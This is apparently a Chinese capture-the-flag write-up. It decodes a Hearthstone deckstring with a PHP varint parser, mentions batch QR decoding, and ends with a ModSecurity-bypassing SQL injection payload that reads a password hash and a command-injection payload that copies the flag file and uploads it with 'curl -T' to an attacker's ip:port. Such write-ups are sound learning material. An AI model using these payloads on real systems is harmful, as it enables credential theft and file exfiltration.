卡组代码是 Base64 编码的字节串,exp
$deckstring = "AAEDAZoFKIwGngXIBrwFzgnQBfIHygf0CIgJkAi+BogJ1gjMCPIHtgeeBeAD6AfyB7YHvgbgA+AD4AO2B7wFkgnMCMwI+ga2B/QImgi6BJAIiAn2BOIJAAA=";
#这是⼀个⾮常有趣的萨满卡组
$binary = base64_decode($deckstring);
$hex = bin2hex($binary);
#对于这个卡组,$hex="00010101fd06000fce069707cc08e20cff0fc814e616b6ac02aeb002a5be02f8bf02f9bf02a2cd02f8d002a6ef0200"
$arr = str_split($hex, 2);
$arr = array_map("hexdec", $arr);
function read_varint(&$data) {
$shift = 0;
$result = 0;
do {
$c = array_shift($data);
$result |= ($c & 0x7f) << $shift;
$shift += 7;
}
while ($c & 0x80);
return $result;
}
function parse_deck($data) {
$reserve = read_varint($data);
if ($reserve != 0) {
printf("Invalid deckstring");
die;
}
$version = read_varint($data);
if ($version != 1) {
printf("Unsupported deckstring version %s", $version);
die;
}
$format = read_varint($data);
$heroes = [];
$num_heroes = read_varint($data);
for ($i = 0; $i < $num_heroes; $i++) {
$heroes[] = read_varint($data);
}
$cards = [];
$num_cards_x1 = read_varint($data);
for ($i = 0; $i < $num_cards_x1; $i++) {
$card_id = read_varint($data);
$cards[] = [$card_id, 1];
}
$num_cards_x2 = read_varint($data);
for ($i = 0; $i < $num_cards_x2; $i++) {
$card_id = read_varint($data);
$cards[] = [$card_id, 2];
}
$num_cards_xn = read_varint($data);
for ($i = 0; $i < $num_cards_xn; $i++) {
$card_id = read_varint($data);
$count = read_varint($data);
$cards[] = [$card_id, $count];
}
return [$cards, $heroes, $format];
}
print_r(parse_deck($arr)[0]);
运行得到
Array
(
[0] => Array
(
[0] => 780
[1] => 1
)
[1] => Array
(
[0] => 670
[1] => 1
)
[2] => Array
(
[0] => 840
[1] => 1
)
[3] => Array
(
[0] => 700
[1] => 1
)
[4] => Array
(
[0] => 1230
[1] => 1
)
[5] => Array
(
[0] => 720
[1] => 1
)
[6] => Array
(
[0] => 1010
[1] => 1
)
[7] => Array
(
[0] => 970
[1] => 1
)
[8] => Array
(
[0] => 1140
[1] => 1
)
[9] => Array
(
[0] => 1160
[1] => 1
)
[10] => Array
(
[0] => 1040
[1] => 1
)
[11] => Array
(
[0] => 830
[1] => 1
)
[12] => Array
(
[0] => 1160
[1] => 1
)
[13] => Array
(
[0] => 1110
[1] => 1
)
[14] => Array
(
[0] => 1100
[1] => 1
)
[15] => Array
(
[0] => 1010
[1] => 1
)
[16] => Array
(
[0] => 950
[1] => 1
)
[17] => Array
(
[0] => 670
[1] => 1
)
[18] => Array
(
[0] => 480
[1] => 1
)
[19] => Array
(
[0] => 1000
[1] => 1
)
[20] => Array
(
[0] => 1010
[1] => 1
)
[21] => Array
(
[0] => 950
[1] => 1
)
[22] => Array
(
[0] => 830
[1] => 1
)
[23] => Array
(
[0] => 480
[1] => 1
)
[24] => Array
(
[0] => 480
[1] => 1
)
[25] => Array
(
[0] => 480
[1] => 1
)
[26] => Array
(
[0] => 950
[1] => 1
)
[27] => Array
(
[0] => 700
[1] => 1
)
[28] => Array
(
[0] => 1170
[1] => 1
)
[29] => Array
(
[0] => 1100
[1] => 1
)
[30] => Array
(
[0] => 1100
[1] => 1
)
[31] => Array
(
[0] => 890
[1] => 1
)
[32] => Array
(
[0] => 950
[1] => 1
)
[33] => Array
(
[0] => 1140
[1] => 1
)
[34] => Array
(
[0] => 1050
[1] => 1
)
[35] => Array
(
[0] => 570
[1] => 1
)
[36] => Array
(
[0] => 1040
[1] => 1
)
[37] => Array
(
[0] => 1160
[1] => 1
)
[38] => Array
(
[0] => 630
[1] => 1
)
[39] => Array
(
[0] => 1250
[1] => 1
)
)
[Finished in 43ms]
将这些[0]的内容除以10.就是ascll码,转换字符串就是flag
二维码批量识别 https://tl.beer/parseqrcode.html
按时间递增排序 批量处理得到flag
HINT:LMQH,利用QR RESEARCH
cve:
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1727
Payload:
?id=@.:=right(right((select hex(password) from users.info where id =1 limit 0,1),1111),1111) union%23%0adistinctrow%0bselect@.
DasCTF三月赛类似,加了几个符号的过滤
https://xiaolong22333.top/index.php/archives/140/
在tmp/log.txt发现⾥⾯有根⽬录,flag名字 Th1s_is__F1114g
通过cp 和curl
/calc?num='''1' cp /T* /1.txt '3'''
/calc?num='''1' curl -T /1.txt ip:port '3'''
```